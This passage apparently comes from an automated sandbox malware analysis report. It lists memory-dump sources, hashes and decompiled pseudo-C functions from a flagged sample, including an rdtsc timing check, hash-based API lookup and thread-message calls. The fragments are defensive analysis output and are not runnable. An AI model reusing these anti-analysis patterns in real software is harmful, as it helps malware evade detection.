                                                          • Associated: 00000006.00000002.984275697.0000000000AE4000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984283870.0000000000AE7000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984289521.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984326505.0000000000B50000.00000040.00000800.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9e0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                          • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                          • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                          • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984109714.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                                                          • Associated: 00000006.00000002.984102532.00000000009E0000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984259252.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984268876.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984275697.0000000000AE4000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984283870.0000000000AE7000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984289521.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984326505.0000000000B50000.00000040.00000800.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9e0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                          • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                          • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                          • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984109714.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                                                          • Associated: 00000006.00000002.984102532.00000000009E0000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984259252.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984268876.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984275697.0000000000AE4000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984283870.0000000000AE7000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984289521.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984326505.0000000000B50000.00000040.00000800.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9e0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                          • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                          • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                          • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984109714.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                                                          • Associated: 00000006.00000002.984102532.00000000009E0000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984259252.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984268876.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984275697.0000000000AE4000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984283870.0000000000AE7000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984289521.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984326505.0000000000B50000.00000040.00000800.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9e0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                          • Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
                                                          • Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                          • Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984109714.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                                                          • Associated: 00000006.00000002.984102532.00000000009E0000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984259252.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984268876.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984275697.0000000000AE4000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984283870.0000000000AE7000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984289521.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984326505.0000000000B50000.00000040.00000800.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9e0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                          • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                          • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                          • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984109714.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                                                          • Associated: 00000006.00000002.984102532.00000000009E0000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984259252.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984268876.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984275697.0000000000AE4000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984283870.0000000000AE7000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984289521.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984326505.0000000000B50000.00000040.00000800.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9e0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                          • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                          • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                          • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984109714.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                                                          • Associated: 00000006.00000002.984102532.00000000009E0000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984259252.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984268876.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984275697.0000000000AE4000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984283870.0000000000AE7000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984289521.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984326505.0000000000B50000.00000040.00000800.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9e0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                          • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                          • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                          • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984109714.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                                                          • Associated: 00000006.00000002.984102532.00000000009E0000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984259252.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984268876.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984275697.0000000000AE4000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984283870.0000000000AE7000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984289521.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984326505.0000000000B50000.00000040.00000800.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9e0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                          • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
                                                          • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                          • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984109714.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                                                          • Associated: 00000006.00000002.984102532.00000000009E0000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984259252.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984268876.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984275697.0000000000AE4000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984283870.0000000000AE7000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984289521.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984326505.0000000000B50000.00000040.00000800.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9e0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                          • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                          • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                          • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984109714.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                                                          • Associated: 00000006.00000002.984102532.00000000009E0000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984259252.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984268876.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984275697.0000000000AE4000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984283870.0000000000AE7000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984289521.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984326505.0000000000B50000.00000040.00000800.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9e0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                          • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                          • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                          • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 93%
                                                          			E00409AA0(intOrPtr* _a4) {
                                                          				intOrPtr _v8;
                                                          				char _v24;
                                                          				char _v284;
                                                          				char _v804;
                                                          				char _v840;
                                                          				void* _t24;
                                                          				void* _t31;
                                                          				void* _t33;
                                                          				void* _t34;
                                                          				void* _t39;
                                                          				void* _t50;
                                                          				intOrPtr* _t52;
                                                          				void* _t53;
                                                          				void* _t54;
                                                          				void* _t55;
                                                          				void* _t56;
                                                          
                                                          				_t52 = _a4;
                                                          				_t39 = 0; // executed
                                                          				_t24 = E00407EA0(_t52,  &_v24); // executed
                                                          				_t54 = _t53 + 8;
                                                          				if(_t24 != 0) {
                                                          					E004080B0( &_v24,  &_v840);
                                                          					_t55 = _t54 + 8;
                                                          					do {
                                                          						E0041BE00( &_v284, 0x104);
                                                          						E0041C470( &_v284,  &_v804);
                                                          						_t56 = _t55 + 0x10;
                                                          						_t50 = 0x4f;
                                                          						while(1) {
                                                          							_t31 = E00414DE0(E00414D80(_t52, _t50),  &_v284);
                                                          							_t56 = _t56 + 0x10;
                                                          							if(_t31 != 0) {
                                                          								break;
                                                          							}
                                                          							_t50 = _t50 + 1;
                                                          							if(_t50 <= 0x62) {
                                                          								continue;
                                                          							} else {
                                                          							}
                                                          							goto L8;
                                                          						}
                                                          						_t9 = _t52 + 0x14; // 0xffffe055
                                                          						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
                                                          						_t39 = 1;
                                                          						L8:
                                                          						_t33 = E004080E0( &_v24,  &_v840);
                                                          						_t55 = _t56 + 8;
                                                          					} while (_t33 != 0 && _t39 == 0);
                                                          					_t34 = E00408160(_t52,  &_v24); // executed
                                                          					if(_t39 == 0) {
                                                          						asm("rdtsc");
                                                          						asm("rdtsc");
                                                          						_v8 = _t34 - 0 + _t34;
                                                          						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
                                                          					}
                                                          					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
                                                          					_t20 = _t52 + 0x31; // 0x5608758b
                                                          					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
                                                          					return 1;
                                                          				} else {
                                                          					return _t24;
                                                          				}
                                                          			}




















                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_400000_dvukljmnr.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9835c872434805b420af9e009800db09fa022f69ef5fa6a2d6e4e63ee433b124
                                                          • Instruction ID: 290ea537485be02d779a264d5a339eceb4dab98af215cfaa17b5abd8430697b8
                                                          • Opcode Fuzzy Hash: 9835c872434805b420af9e009800db09fa022f69ef5fa6a2d6e4e63ee433b124
                                                          • Instruction Fuzzy Hash: FD213AB2D442095BCB21D664AD42BFF73BCAB54314F04007FE949A3182F638BF498BA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          C-Code - Quality: 18%
                                                          			E0041A692(void* __ebx, void* __eflags, intOrPtr _a4, int _a8, char _a12, long _a16, long _a20) {
                                                          				intOrPtr* __esi;
                                                          				void* __ebp;
                                                          				void* _t18;
                                                          				void* _t20;
                                                          				void* _t22;
                                                          				void* _t25;
                                                          				void* _t26;
                                                          
                                                          				asm("in al, 0xf0");
                                                          				asm("adc cl, [ebx+0x6f]");
                                                          				if(__eflags <= 0) {
                                                          					__eflags =  *(__ebx + 0x55557d72) * 0xffffff8b;
                                                          					__ebp = __esp;
                                                          					__esi = _a4 + 0xc7c;
                                                          					ExitProcess(_a8);
                                                          				}
                                                          				 *((intOrPtr*)(_t20 - 0x73)) =  *((intOrPtr*)(_t20 - 0x73)) + _t22;
                                                          				 *((intOrPtr*)(_t26 + 0x50)) =  *((intOrPtr*)(_t26 + 0x50)) + _t22;
                                                          				E0041AF50(_t25);
                                                          				_t7 =  &_a12; // 0x414526
                                                          				_t18 = RtlAllocateHeap( *_t7, _a16, _a20); // executed
                                                          				return _t18;
                                                          			}











                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(&EA,?,00414C9F,00414C9F,?,00414526,?,?,?,?,?,00000000,00409CE3,?), ref: 0041A64D
                                                          • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 0041A6C8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_400000_dvukljmnr.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateExitHeapProcess
                                                          • String ID: &EA
                                                          • API String ID: 1054155344-1330915590
                                                          • Opcode ID: 9ddf71653d483460c39806f305d76505489e6f16b7275dbe693c9e7e07c05345
                                                          • Instruction ID: d00da0fc24fa43dfddb9da27cb984b5bb85f809a5ccfa62c29cf1a0df3718626
                                                          • Opcode Fuzzy Hash: 9ddf71653d483460c39806f305d76505489e6f16b7275dbe693c9e7e07c05345
                                                          • Instruction Fuzzy Hash: BCF0AFB91042406FD710EF78CC91EEB7BA8AF48354F148599FC5C5B346C231E9158AA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 13 41a620-41a651 call 41af50 RtlAllocateHeap
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(&EA,?,00414C9F,00414C9F,?,00414526,?,?,?,?,?,00000000,00409CE3,?), ref: 0041A64D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_400000_dvukljmnr.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID: &EA
                                                          • API String ID: 1279760036-1330915590
                                                          • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                          • Instruction ID: 51260f1f489a67c7b9949974b81657d9e18ee3442a924465d5a53260c52aa3af
                                                          • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                          • Instruction Fuzzy Hash: AFE012B1200208ABDB14EF99CC41EA777ACAF88664F118559BA1C5B242C630F9118AB4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 211 408309-40830b 212 408339-40835a call 40ace0 call 414e40 211->212 213 40830d-408336 call 41be50 call 41c9f0 211->213 222 40835c-40836e PostThreadMessageW 212->222 223 40838e-408392 212->223 213->212 224 408370-40838a call 40a470 222->224 225 40838d 222->225 224->225 225->223
                                                          C-Code - Quality: 67%
                                                          			E00408309(void* __ebx, void* __eflags, intOrPtr _a4, long _a12) {
                                                          				char _v67;
                                                          				char _v68;
                                                          				void* _t11;
                                                          				int _t12;
                                                          				char* _t21;
                                                          				long _t23;
                                                          				intOrPtr _t25;
                                                          				int _t27;
                                                          				intOrPtr _t29;
                                                          				intOrPtr _t31;
                                                          				intOrPtr _t35;
                                                          
                                                          				_t36 = __eflags;
                                                          				asm("in al, 0x42");
                                                          				if(__eflags == 0) {
                                                          					_t1 = __ebx - 0x1374aa47;
                                                          					_t35 =  *_t1;
                                                          					 *_t1 = _t31;
                                                          					_push(_t29);
                                                          					_t29 = _t35;
                                                          					_t31 = _t35 - 0x40;
                                                          					_push(_t25);
                                                          					_v68 = 0;
                                                          					E0041BE50( &_v67, 0, 0x3f);
                                                          					E0041C9F0( &_v68, 3);
                                                          					_t25 = _a4;
                                                          					_t21 =  &_v68;
                                                          				}
                                                          				_t11 = E0040ACE0(_t36, _t25 + 0x1c, _t21); // executed
                                                          				_t12 = E00414E40(_t25 + 0x1c, _t11, 0, 0, 0xc4e7b6d6);
                                                          				_t27 = _t12;
                                                          				if(_t27 != 0) {
                                                          					_t23 = _a12;
                                                          					_t12 = PostThreadMessageW(_t23, 0x111, 0, 0); // executed
                                                          					_t38 = _t12;
                                                          					if(_t12 == 0) {
                                                          						_t12 =  *_t27(_t23, 0x8003, _t29 + (E0040A470(_t38, 1, 8) & 0x000000ff) - 0x40, _t12);
                                                          					}
                                                          				}
                                                          				return _t12;
                                                          			}















                                                          APIs
                                                          • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_400000_dvukljmnr.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: MessagePostThread
                                                          • String ID:
                                                          • API String ID: 1836367815-0
                                                          • Opcode ID: 757677ac8006fff5808dbb0f83c71857243fa7dba392e7765e98395b4de22cb4
                                                          • Instruction ID: c60474528973503b6e3d4f7b1e86d2aa81c484ba3d6bcd3f995390e9496bdaf8
                                                          • Opcode Fuzzy Hash: 757677ac8006fff5808dbb0f83c71857243fa7dba392e7765e98395b4de22cb4
                                                          • Instruction Fuzzy Hash: 2801B571A80328B7EB21A6558D43FFF772CAB40B54F04412EFF04BA1C1DAB9690546EA
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 228 408310-40831f 229 408328-40835a call 41c9f0 call 40ace0 call 414e40 228->229 230 408323 call 41be50 228->230 238 40835c-40836e PostThreadMessageW 229->238 239 40838e-408392 229->239 230->229 240 408370-40838a call 40a470 238->240 241 40838d 238->241 240->241 241->239
                                                          C-Code - Quality: 82%
                                                          			E00408310(void* __eflags, intOrPtr _a4, long _a8) {
                                                          				char _v67;
                                                          				char _v68;
                                                          				void* _t12;
                                                          				intOrPtr* _t13;
                                                          				int _t14;
                                                          				long _t21;
                                                          				intOrPtr _t23;
                                                          				intOrPtr* _t25;
                                                          				void* _t26;
                                                          				void* _t30;
                                                          
                                                          				_t30 = __eflags;
                                                          				_v68 = 0;
                                                          				E0041BE50( &_v67, 0, 0x3f);
                                                          				E0041C9F0( &_v68, 3);
                                                          				_t23 = _a4;
                                                          				_t12 = E0040ACE0(_t30, _t23 + 0x1c,  &_v68); // executed
                                                          				_t13 = E00414E40(_t23 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
                                                          				_t25 = _t13;
                                                          				if(_t25 != 0) {
                                                          					_t21 = _a8;
                                                          					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
                                                          					_t32 = _t14;
                                                          					if(_t14 == 0) {
                                                          						_t14 =  *_t25(_t21, 0x8003, _t26 + (E0040A470(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
                                                          					}
                                                          					return _t14;
                                                          				}
                                                          				return _t13;
                                                          			}














                                                          APIs
                                                          • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_400000_dvukljmnr.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: MessagePostThread
                                                          • String ID:
                                                          • API String ID: 1836367815-0
                                                          • Opcode ID: f4de9516877f5e66a6906b262a8032ebdb3878444ce067a10c23a558afbe5810
                                                          • Instruction ID: d17f8cfce065c66642409dfa920775f821b8147089a61b374e72855f6ed3688e
                                                          • Opcode Fuzzy Hash: f4de9516877f5e66a6906b262a8032ebdb3878444ce067a10c23a558afbe5810
                                                          • Instruction Fuzzy Hash: E0018471A8032877E720A6959C43FFE776C6B40F54F05412AFF04BA1C2E6A8690546EA
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 268 41a652-41a677 call 41af50 270 41a67c-41a691 RtlFreeHeap 268->270
                                                          C-Code - Quality: 100%
                                                          			E0041A652(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                                          				char _t11;
                                                          				void* _t17;
                                                          
                                                          				 *0x55ce523e = 0xe128aff2;
                                                          				_t8 = _a4;
                                                          				_t3 = _t8 + 0xc74; // 0xc74
                                                          				E0041AF50(_t17, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                                          				_t11 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                                          				return _t11;
                                                          			}






                                                          APIs
                                                          • RtlFreeHeap.NTDLL(00000060,00409CE3,?,?,00409CE3,00000060,00000000,00000000,?,?,00409CE3,?,00000000), ref: 0041A68D
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_400000_dvukljmnr.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID:
                                                          • API String ID: 3298025750-0
